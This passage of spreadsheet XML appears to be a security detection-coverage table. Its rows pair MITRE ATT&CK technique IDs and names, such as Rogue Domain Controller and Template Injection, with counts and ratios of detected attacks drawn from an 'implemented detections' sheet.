      </c>
      <c r="CA39" s="394">
        <v>0</v>
      </c>
      <c r="CB39" s="292">
        <v>0</v>
      </c>
      <c r="CC39" s="322">
        <v>0</v>
      </c>
      <c r="CD39" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE39" s="12">
        <v>0</v>
      </c>
      <c r="CF39" s="12">
        <v>0</v>
      </c>
      <c r="CG39" s="13">
        <v>0</v>
      </c>
      <c r="CH39" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A40" s="4">
        <f t="shared" si="3"/>
        <v>38</v>
      </c>
      <c r="B40" s="4" t="str">
        <f>IFERROR(VLOOKUP(A40,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1205</v>
      </c>
      <c r="C40" s="493" t="str">
        <f>IFERROR(VLOOKUP(B40,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="D40" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B40)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E40" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F40" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (5)</v>
      </c>
      <c r="G40" s="292"/>
      <c r="H40" s="322"/>
      <c r="I40" s="322"/>
      <c r="J40" s="12"/>
      <c r="K40" s="13"/>
      <c r="L40" s="394"/>
      <c r="M40" s="322"/>
      <c r="N40" s="322"/>
      <c r="O40" s="322"/>
      <c r="P40" s="12"/>
      <c r="Q40" s="13"/>
      <c r="R40" s="394"/>
      <c r="S40" s="292"/>
      <c r="T40" s="322"/>
      <c r="U40" s="322"/>
      <c r="V40" s="12"/>
      <c r="W40" s="13"/>
      <c r="X40" s="394"/>
      <c r="Y40" s="392"/>
      <c r="Z40" s="392"/>
      <c r="AA40" s="322"/>
      <c r="AB40" s="392"/>
      <c r="AC40" s="16"/>
      <c r="AD40" s="394"/>
      <c r="AE40" s="392"/>
      <c r="AF40" s="392"/>
      <c r="AG40" s="322"/>
      <c r="AH40" s="392"/>
      <c r="AI40" s="16"/>
      <c r="AJ40" s="394"/>
      <c r="AK40" s="392"/>
      <c r="AL40" s="392"/>
      <c r="AM40" s="322"/>
      <c r="AN40" s="392"/>
      <c r="AO40" s="16"/>
      <c r="AP40" s="394"/>
      <c r="AQ40" s="292"/>
      <c r="AR40" s="322"/>
      <c r="AS40" s="322"/>
      <c r="AT40" s="12"/>
      <c r="AU40" s="13"/>
      <c r="AV40" s="394"/>
      <c r="AW40" s="392"/>
      <c r="AX40" s="392"/>
      <c r="AY40" s="322"/>
      <c r="AZ40" s="4"/>
      <c r="BA40" s="16"/>
      <c r="BB40" s="394"/>
      <c r="BC40" s="292"/>
      <c r="BD40" s="322"/>
      <c r="BE40" s="322"/>
      <c r="BF40" s="12"/>
      <c r="BG40" s="13"/>
      <c r="BH40" s="394"/>
      <c r="BI40" s="292">
        <v>0</v>
      </c>
      <c r="BJ40" s="322">
        <v>0</v>
      </c>
      <c r="BK40" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL40" s="12">
        <v>0</v>
      </c>
      <c r="BM40" s="13">
        <v>0</v>
      </c>
      <c r="BN40" s="394">
        <v>0</v>
      </c>
      <c r="BO40" s="292">
        <v>1</v>
      </c>
      <c r="BP40" s="322">
        <v>1</v>
      </c>
      <c r="BQ40" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR40" s="12">
        <v>0</v>
      </c>
      <c r="BS40" s="12">
        <v>1</v>
      </c>
      <c r="BT40" s="13">
        <v>1</v>
      </c>
      <c r="BU40" s="394">
        <v>1</v>
      </c>
      <c r="BV40" s="292">
        <v>0</v>
      </c>
      <c r="BW40" s="322">
        <v>0</v>
      </c>
      <c r="BX40" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY40" s="12">
        <v>0</v>
      </c>
      <c r="BZ40" s="13">
        <v>0</v>
      </c>
      <c r="CA40" s="394">
        <v>0</v>
      </c>
      <c r="CB40" s="292">
        <v>0</v>
      </c>
      <c r="CC40" s="322">
        <v>0</v>
      </c>
      <c r="CD40" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE40" s="12">
        <v>0</v>
      </c>
      <c r="CF40" s="12">
        <v>0</v>
      </c>
      <c r="CG40" s="13">
        <v>0</v>
      </c>
      <c r="CH40" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A41" s="4">
        <f t="shared" si="3"/>
        <v>39</v>
      </c>
      <c r="B41" s="4" t="str">
        <f>IFERROR(VLOOKUP(A41,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1207</v>
      </c>
      <c r="C41" s="493" t="str">
        <f>IFERROR(VLOOKUP(B41,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="D41" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B41)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E41" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>88</v>
      </c>
      <c r="F41" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (88)</v>
      </c>
      <c r="G41" s="292"/>
      <c r="H41" s="322"/>
      <c r="I41" s="322"/>
      <c r="J41" s="12"/>
      <c r="K41" s="13"/>
      <c r="L41" s="394"/>
      <c r="M41" s="322"/>
      <c r="N41" s="322"/>
      <c r="O41" s="322"/>
      <c r="P41" s="12"/>
      <c r="Q41" s="13"/>
      <c r="R41" s="394"/>
      <c r="S41" s="292"/>
      <c r="T41" s="322"/>
      <c r="U41" s="322"/>
      <c r="V41" s="12"/>
      <c r="W41" s="13"/>
      <c r="X41" s="394"/>
      <c r="Y41" s="392"/>
      <c r="Z41" s="392"/>
      <c r="AA41" s="322"/>
      <c r="AB41" s="392"/>
      <c r="AC41" s="16"/>
      <c r="AD41" s="394"/>
      <c r="AE41" s="392"/>
      <c r="AF41" s="392"/>
      <c r="AG41" s="322"/>
      <c r="AH41" s="392"/>
      <c r="AI41" s="16"/>
      <c r="AJ41" s="394"/>
      <c r="AK41" s="392"/>
      <c r="AL41" s="392"/>
      <c r="AM41" s="322"/>
      <c r="AN41" s="392"/>
      <c r="AO41" s="16"/>
      <c r="AP41" s="394"/>
      <c r="AQ41" s="292"/>
      <c r="AR41" s="322"/>
      <c r="AS41" s="322"/>
      <c r="AT41" s="12"/>
      <c r="AU41" s="13"/>
      <c r="AV41" s="394"/>
      <c r="AW41" s="392"/>
      <c r="AX41" s="392"/>
      <c r="AY41" s="322"/>
      <c r="AZ41" s="4"/>
      <c r="BA41" s="16"/>
      <c r="BB41" s="394"/>
      <c r="BC41" s="292"/>
      <c r="BD41" s="322"/>
      <c r="BE41" s="322"/>
      <c r="BF41" s="12"/>
      <c r="BG41" s="13"/>
      <c r="BH41" s="394"/>
      <c r="BI41" s="292">
        <v>0</v>
      </c>
      <c r="BJ41" s="322">
        <v>0</v>
      </c>
      <c r="BK41" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL41" s="12">
        <v>0</v>
      </c>
      <c r="BM41" s="13">
        <v>0</v>
      </c>
      <c r="BN41" s="394">
        <v>0</v>
      </c>
      <c r="BO41" s="292">
        <v>74</v>
      </c>
      <c r="BP41" s="322">
        <v>74</v>
      </c>
      <c r="BQ41" s="322" t="str">
        <f t="shared" si="1"/>
        <v>74 (74)</v>
      </c>
      <c r="BR41" s="12">
        <v>0</v>
      </c>
      <c r="BS41" s="12">
        <v>7</v>
      </c>
      <c r="BT41" s="13">
        <v>1</v>
      </c>
      <c r="BU41" s="394">
        <v>73</v>
      </c>
      <c r="BV41" s="292">
        <v>0</v>
      </c>
      <c r="BW41" s="322">
        <v>0</v>
      </c>
      <c r="BX41" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY41" s="12">
        <v>0</v>
      </c>
      <c r="BZ41" s="13">
        <v>0</v>
      </c>
      <c r="CA41" s="394">
        <v>0</v>
      </c>
      <c r="CB41" s="292">
        <v>0</v>
      </c>
      <c r="CC41" s="322">
        <v>0</v>
      </c>
      <c r="CD41" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE41" s="12">
        <v>0</v>
      </c>
      <c r="CF41" s="12">
        <v>0</v>
      </c>
      <c r="CG41" s="13">
        <v>0</v>
      </c>
      <c r="CH41" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:86" ht="15" customHeight="1">
      <c r="A42" s="4">
        <f t="shared" si="3"/>
        <v>40</v>
      </c>
      <c r="B42" s="4" t="str">
        <f>IFERROR(VLOOKUP(A42,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1210</v>
      </c>
      <c r="C42" s="493" t="str">
        <f>IFERROR(VLOOKUP(B42,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="D42" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B42)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E42" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>287</v>
      </c>
      <c r="F42" s="579" t="str">
        <f t="shared" si="4"/>
        <v>3 (287)</v>
      </c>
      <c r="G42" s="292"/>
      <c r="H42" s="322"/>
      <c r="I42" s="322"/>
      <c r="J42" s="12"/>
      <c r="K42" s="13"/>
      <c r="L42" s="394"/>
      <c r="M42" s="322"/>
      <c r="N42" s="322"/>
      <c r="O42" s="322"/>
      <c r="P42" s="12"/>
      <c r="Q42" s="13"/>
      <c r="R42" s="394"/>
      <c r="S42" s="292"/>
      <c r="T42" s="322"/>
      <c r="U42" s="322"/>
      <c r="V42" s="12"/>
      <c r="W42" s="13"/>
      <c r="X42" s="394"/>
      <c r="Y42" s="392"/>
      <c r="Z42" s="392"/>
      <c r="AA42" s="322"/>
      <c r="AB42" s="392"/>
      <c r="AC42" s="16"/>
      <c r="AD42" s="394"/>
      <c r="AE42" s="392"/>
      <c r="AF42" s="392"/>
      <c r="AG42" s="322"/>
      <c r="AH42" s="392"/>
      <c r="AI42" s="16"/>
      <c r="AJ42" s="394"/>
      <c r="AK42" s="392"/>
      <c r="AL42" s="392"/>
      <c r="AM42" s="322"/>
      <c r="AN42" s="392"/>
      <c r="AO42" s="16"/>
      <c r="AP42" s="394"/>
      <c r="AQ42" s="292"/>
      <c r="AR42" s="322"/>
      <c r="AS42" s="322"/>
      <c r="AT42" s="12"/>
      <c r="AU42" s="13"/>
      <c r="AV42" s="394"/>
      <c r="AW42" s="392"/>
      <c r="AX42" s="392"/>
      <c r="AY42" s="322"/>
      <c r="BA42" s="16"/>
      <c r="BB42" s="394"/>
      <c r="BC42" s="292"/>
      <c r="BD42" s="322"/>
      <c r="BE42" s="322"/>
      <c r="BF42" s="12"/>
      <c r="BG42" s="13"/>
      <c r="BH42" s="394"/>
      <c r="BI42" s="292">
        <v>6</v>
      </c>
      <c r="BJ42" s="322">
        <v>4</v>
      </c>
      <c r="BK42" s="322" t="str">
        <f t="shared" si="0"/>
        <v>4 (6)</v>
      </c>
      <c r="BL42" s="12">
        <v>4</v>
      </c>
      <c r="BM42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN42" s="394">
        <v>4</v>
      </c>
      <c r="BO42" s="292">
        <v>292</v>
      </c>
      <c r="BP42" s="322">
        <v>290</v>
      </c>
      <c r="BQ42" s="322" t="str">
        <f t="shared" si="1"/>
        <v>290 (292)</v>
      </c>
      <c r="BR42" s="12">
        <v>4</v>
      </c>
      <c r="BS42" s="12">
        <v>6</v>
      </c>
      <c r="BT42" s="13">
        <v>1</v>
      </c>
      <c r="BU42" s="394">
        <v>283</v>
      </c>
      <c r="BV42" s="292">
        <v>2</v>
      </c>
      <c r="BW42" s="322">
        <v>2</v>
      </c>
      <c r="BX42" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (2)</v>
      </c>
      <c r="BY42" s="12">
        <v>2</v>
      </c>
      <c r="BZ42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="CA42" s="394">
        <v>2</v>
      </c>
      <c r="CB42" s="292">
        <v>2</v>
      </c>
      <c r="CC42" s="322">
        <v>1</v>
      </c>
      <c r="CD42" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (2)</v>
      </c>
      <c r="CE42" s="12">
        <v>2</v>
      </c>
      <c r="CF42" s="12">
        <v>1</v>
      </c>
      <c r="CG42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="CH42" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:86" ht="15" customHeight="1">
      <c r="A43" s="4">
        <f t="shared" si="3"/>
        <v>41</v>
      </c>
      <c r="B43" s="4" t="str">
        <f>IFERROR(VLOOKUP(A43,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1218</v>
      </c>
      <c r="C43" s="493" t="str">
        <f>IFERROR(VLOOKUP(B43,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Binary Proxy Execution</v>
      </c>
      <c r="D43" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B43)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E43" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F43" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (2)</v>
      </c>
      <c r="G43" s="292"/>
      <c r="H43" s="322"/>
      <c r="I43" s="322"/>
      <c r="J43" s="12"/>
      <c r="K43" s="13"/>
      <c r="L43" s="394"/>
      <c r="M43" s="322"/>
      <c r="N43" s="322"/>
      <c r="O43" s="322"/>
      <c r="P43" s="12"/>
      <c r="Q43" s="13"/>
      <c r="R43" s="394"/>
      <c r="S43" s="292"/>
      <c r="T43" s="322"/>
      <c r="U43" s="322"/>
      <c r="V43" s="12"/>
      <c r="W43" s="13"/>
      <c r="X43" s="394"/>
      <c r="Y43" s="392"/>
      <c r="Z43" s="392"/>
      <c r="AA43" s="322"/>
      <c r="AB43" s="392"/>
      <c r="AC43" s="16"/>
      <c r="AD43" s="394"/>
      <c r="AE43" s="392"/>
      <c r="AF43" s="392"/>
      <c r="AG43" s="322"/>
      <c r="AH43" s="392"/>
      <c r="AI43" s="16"/>
      <c r="AJ43" s="394"/>
      <c r="AK43" s="392"/>
      <c r="AL43" s="392"/>
      <c r="AM43" s="322"/>
      <c r="AN43" s="392"/>
      <c r="AO43" s="16"/>
      <c r="AP43" s="394"/>
      <c r="AQ43" s="292"/>
      <c r="AR43" s="322"/>
      <c r="AS43" s="322"/>
      <c r="AT43" s="12"/>
      <c r="AU43" s="13"/>
      <c r="AV43" s="394"/>
      <c r="AW43" s="392"/>
      <c r="AX43" s="392"/>
      <c r="AY43" s="322"/>
      <c r="BA43" s="16"/>
      <c r="BB43" s="394"/>
      <c r="BC43" s="292"/>
      <c r="BD43" s="322"/>
      <c r="BE43" s="322"/>
      <c r="BF43" s="12"/>
      <c r="BG43" s="13"/>
      <c r="BH43" s="394"/>
      <c r="BI43" s="292">
        <v>0</v>
      </c>
      <c r="BJ43" s="322">
        <v>0</v>
      </c>
      <c r="BK43" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL43" s="12">
        <v>0</v>
      </c>
      <c r="BM43" s="13">
        <v>0</v>
      </c>
      <c r="BN43" s="394">
        <v>0</v>
      </c>
      <c r="BO43" s="292">
        <v>1</v>
      </c>
      <c r="BP43" s="322">
        <v>1</v>
      </c>
      <c r="BQ43" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR43" s="12">
        <v>0</v>
      </c>
      <c r="BS43" s="12">
        <v>1</v>
      </c>
      <c r="BT43" s="13">
        <v>1</v>
      </c>
      <c r="BU43" s="394">
        <v>1</v>
      </c>
      <c r="BV43" s="292">
        <v>0</v>
      </c>
      <c r="BW43" s="322">
        <v>0</v>
      </c>
      <c r="BX43" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY43" s="12">
        <v>0</v>
      </c>
      <c r="BZ43" s="13">
        <v>0</v>
      </c>
      <c r="CA43" s="394">
        <v>0</v>
      </c>
      <c r="CB43" s="292">
        <v>0</v>
      </c>
      <c r="CC43" s="322">
        <v>0</v>
      </c>
      <c r="CD43" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE43" s="12">
        <v>0</v>
      </c>
      <c r="CF43" s="12">
        <v>0</v>
      </c>
      <c r="CG43" s="13">
        <v>0</v>
      </c>
      <c r="CH43" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:86" ht="15" customHeight="1">
      <c r="A44" s="4">
        <f t="shared" si="3"/>
        <v>42</v>
      </c>
      <c r="B44" s="4" t="str">
        <f>IFERROR(VLOOKUP(A44,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1219</v>
      </c>
      <c r="C44" s="493" t="str">
        <f>IFERROR(VLOOKUP(B44,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Access Tools</v>
      </c>
      <c r="D44" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B44)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E44" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>147</v>
      </c>
      <c r="F44" s="579" t="str">
        <f t="shared" si="4"/>
        <v>2 (147)</v>
      </c>
      <c r="G44" s="292"/>
      <c r="H44" s="322"/>
      <c r="I44" s="322"/>
      <c r="J44" s="12"/>
      <c r="K44" s="13"/>
      <c r="L44" s="394"/>
      <c r="M44" s="322"/>
      <c r="N44" s="322"/>
      <c r="O44" s="322"/>
      <c r="P44" s="12"/>
      <c r="Q44" s="13"/>
      <c r="R44" s="394"/>
      <c r="S44" s="292"/>
      <c r="T44" s="322"/>
      <c r="U44" s="322"/>
      <c r="V44" s="12"/>
      <c r="W44" s="13"/>
      <c r="X44" s="394"/>
      <c r="Y44" s="392"/>
      <c r="Z44" s="392"/>
      <c r="AA44" s="322"/>
      <c r="AB44" s="392"/>
      <c r="AC44" s="16"/>
      <c r="AD44" s="394"/>
      <c r="AE44" s="392"/>
      <c r="AF44" s="392"/>
      <c r="AG44" s="322"/>
      <c r="AH44" s="392"/>
      <c r="AI44" s="16"/>
      <c r="AJ44" s="394"/>
      <c r="AK44" s="392"/>
      <c r="AL44" s="392"/>
      <c r="AM44" s="322"/>
      <c r="AN44" s="392"/>
      <c r="AO44" s="16"/>
      <c r="AP44" s="394"/>
      <c r="AQ44" s="292"/>
      <c r="AR44" s="322"/>
      <c r="AS44" s="322"/>
      <c r="AT44" s="12"/>
      <c r="AU44" s="13"/>
      <c r="AV44" s="394"/>
      <c r="AW44" s="392"/>
      <c r="AX44" s="392"/>
      <c r="AY44" s="322"/>
      <c r="BA44" s="16"/>
      <c r="BB44" s="394"/>
      <c r="BC44" s="292"/>
      <c r="BD44" s="322"/>
      <c r="BE44" s="322"/>
      <c r="BF44" s="12"/>
      <c r="BG44" s="13"/>
      <c r="BH44" s="394"/>
      <c r="BI44" s="292">
        <v>3</v>
      </c>
      <c r="BJ44" s="322">
        <v>2</v>
      </c>
      <c r="BK44" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (3)</v>
      </c>
      <c r="BL44" s="12">
        <v>1</v>
      </c>
      <c r="BM44" s="13">
        <v>0.5</v>
      </c>
      <c r="BN44" s="394">
        <v>2</v>
      </c>
      <c r="BO44" s="292">
        <v>126</v>
      </c>
      <c r="BP44" s="322">
        <v>125</v>
      </c>
      <c r="BQ44" s="322" t="str">
        <f t="shared" si="1"/>
        <v>125 (126)</v>
      </c>
      <c r="BR44" s="12">
        <v>1</v>
      </c>
      <c r="BS44" s="12">
        <v>3</v>
      </c>
      <c r="BT44" s="13">
        <v>0.5</v>
      </c>
      <c r="BU44" s="394">
        <v>124</v>
      </c>
      <c r="BV44" s="292">
        <v>0</v>
      </c>
      <c r="BW44" s="322">
        <v>0</v>
      </c>
      <c r="BX44" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY44" s="12">
        <v>0</v>
      </c>
      <c r="BZ44" s="13">
        <v>0</v>
      </c>
      <c r="CA44" s="394">
        <v>0</v>
      </c>
      <c r="CB44" s="292">
        <v>0</v>
      </c>
      <c r="CC44" s="322">
        <v>0</v>
      </c>
      <c r="CD44" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE44" s="12">
        <v>0</v>
      </c>
      <c r="CF44" s="12">
        <v>0</v>
      </c>
      <c r="CG44" s="13">
        <v>0</v>
      </c>
      <c r="CH44" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:86" ht="15" customHeight="1">
      <c r="A45" s="4">
        <f t="shared" si="3"/>
        <v>43</v>
      </c>
      <c r="B45" s="4" t="str">
        <f>IFERROR(VLOOKUP(A45,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1221</v>
      </c>
      <c r="C45" s="493" t="str">
        <f>IFERROR(VLOOKUP(B45,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Template Injection</v>
      </c>
      <c r="D45" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B45)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E45" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>16</v>
      </c>
      <c r="F45" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (16)</v>
      </c>
      <c r="G45" s="292"/>
      <c r="H45" s="322"/>
      <c r="I45" s="322"/>
      <c r="J45" s="12"/>
      <c r="K45" s="13"/>
      <c r="L45" s="394"/>
      <c r="M45" s="322"/>
      <c r="N45" s="322"/>
      <c r="O45" s="322"/>
      <c r="P45" s="12"/>
      <c r="Q45" s="13"/>
      <c r="R45" s="394"/>
      <c r="S45" s="292"/>
      <c r="T45" s="322"/>
      <c r="U45" s="322"/>
      <c r="V45" s="12"/>
      <c r="W45" s="13"/>
      <c r="X45" s="394"/>
      <c r="Y45" s="392"/>
      <c r="Z45" s="392"/>
      <c r="AA45" s="322"/>
      <c r="AB45" s="392"/>
      <c r="AC45" s="16"/>
      <c r="AD45" s="394"/>
      <c r="AE45" s="392"/>
      <c r="AF45" s="392"/>
      <c r="AG45" s="322"/>
      <c r="AH45" s="392"/>
      <c r="AI45" s="16"/>
      <c r="AJ45" s="394"/>
      <c r="AK45" s="392"/>
      <c r="AL45" s="392"/>
      <c r="AM45" s="322"/>
      <c r="AN45" s="392"/>
      <c r="AO45" s="16"/>
      <c r="AP45" s="394"/>
      <c r="AQ45" s="292"/>
      <c r="AR45" s="322"/>
      <c r="AS45" s="322"/>
      <c r="AT45" s="12"/>
      <c r="AU45" s="13"/>
      <c r="AV45" s="394"/>
      <c r="AW45" s="392"/>
      <c r="AX45" s="392"/>
      <c r="AY45" s="322"/>
      <c r="BA45" s="16"/>
      <c r="BB45" s="394"/>
      <c r="BC45" s="292"/>
      <c r="BD45" s="322"/>
      <c r="BE45" s="322"/>
      <c r="BF45" s="12"/>
      <c r="BG45" s="13"/>
      <c r="BH45" s="394"/>
      <c r="BI45" s="292">
        <v>2</v>
      </c>
      <c r="BJ45" s="322">
        <v>1</v>
      </c>
      <c r="BK45" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="BL45" s="12">
        <v>1</v>
      </c>
      <c r="BM45" s="13">
        <v>1</v>
      </c>
      <c r="BN45" s="394">
        <v>1</v>
      </c>
      <c r="BO45" s="292">
        <v>9</v>
      </c>
      <c r="BP45" s="322">
        <v>6</v>
      </c>
      <c r="BQ45" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (9)</v>
      </c>
      <c r="BR45" s="12">
        <v>1</v>
      </c>
      <c r="BS45" s="12">
        <v>5</v>
      </c>
      <c r="BT45" s="13">
        <v>1</v>
      </c>
      <c r="BU45" s="394">
        <v>6</v>
      </c>
      <c r="BV45" s="292">
        <v>0</v>
      </c>
      <c r="BW45" s="322">
        <v>0</v>
      </c>
      <c r="BX45" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY45" s="12">
        <v>0</v>
      </c>
      <c r="BZ45" s="13">
        <v>0</v>
      </c>
      <c r="CA45" s="394">
        <v>0</v>
      </c>
      <c r="CB45" s="292">
        <v>0</v>
      </c>
      <c r="CC45" s="322">
        <v>0</v>
      </c>
      <c r="CD45" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE45" s="12">
        <v>0</v>
      </c>
      <c r="CF45" s="12">
        <v>0</v>
      </c>
      <c r="CG45" s="13">
        <v>0</v>
      </c>
      <c r="CH45" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:86" ht="15" customHeight="1">
      <c r="A46" s="4">
        <f t="shared" si="3"/>
        <v>44</v>
      </c>
      <c r="B46" s="4" t="str">
        <f>IFERROR(VLOOKUP(A46,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1482</v>
      </c>
      <c r="C46" s="493" t="str">
        <f>IFERROR(VLOOKUP(B46,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="D46" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B46)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E46" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>4</v>
      </c>
      <c r="F46" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (4)</v>
      </c>
      <c r="G46" s="292"/>
      <c r="H46" s="322"/>
      <c r="I46" s="322"/>
      <c r="J46" s="12"/>
      <c r="K46" s="13"/>
      <c r="L46" s="394"/>
      <c r="M46" s="322"/>
      <c r="N46" s="322"/>
      <c r="O46" s="322"/>
      <c r="P46" s="12"/>
      <c r="Q46" s="13"/>
      <c r="R46" s="394"/>
      <c r="S46" s="292"/>
      <c r="T46" s="322"/>
      <c r="U46" s="322"/>
      <c r="V46" s="12"/>
      <c r="W46" s="13"/>
      <c r="X46" s="394"/>
      <c r="Y46" s="392"/>
      <c r="Z46" s="392"/>
      <c r="AA46" s="322"/>
      <c r="AB46" s="392"/>
      <c r="AC46" s="16"/>
      <c r="AD46" s="394"/>
      <c r="AE46" s="392"/>
      <c r="AF46" s="392"/>
      <c r="AG46" s="322"/>
      <c r="AH46" s="392"/>
      <c r="AI46" s="16"/>
      <c r="AJ46" s="394"/>
      <c r="AK46" s="392"/>
      <c r="AL46" s="392"/>
      <c r="AM46" s="322"/>
      <c r="AN46" s="392"/>
      <c r="AO46" s="16"/>
      <c r="AP46" s="394"/>
      <c r="AQ46" s="292"/>
      <c r="AR46" s="322"/>
      <c r="AS46" s="322"/>
      <c r="AT46" s="12"/>
      <c r="AU46" s="13"/>
      <c r="AV46" s="394"/>
      <c r="AW46" s="392"/>
      <c r="AX46" s="392"/>
      <c r="AY46" s="322"/>
      <c r="BA46" s="16"/>
      <c r="BB46" s="394"/>
      <c r="BC46" s="292"/>
      <c r="BD46" s="322"/>
      <c r="BE46" s="322"/>
      <c r="BF46" s="12"/>
      <c r="BG46" s="13"/>
      <c r="BH46" s="394"/>
      <c r="BI46" s="292">
        <v>0</v>
      </c>
      <c r="BJ46" s="322">
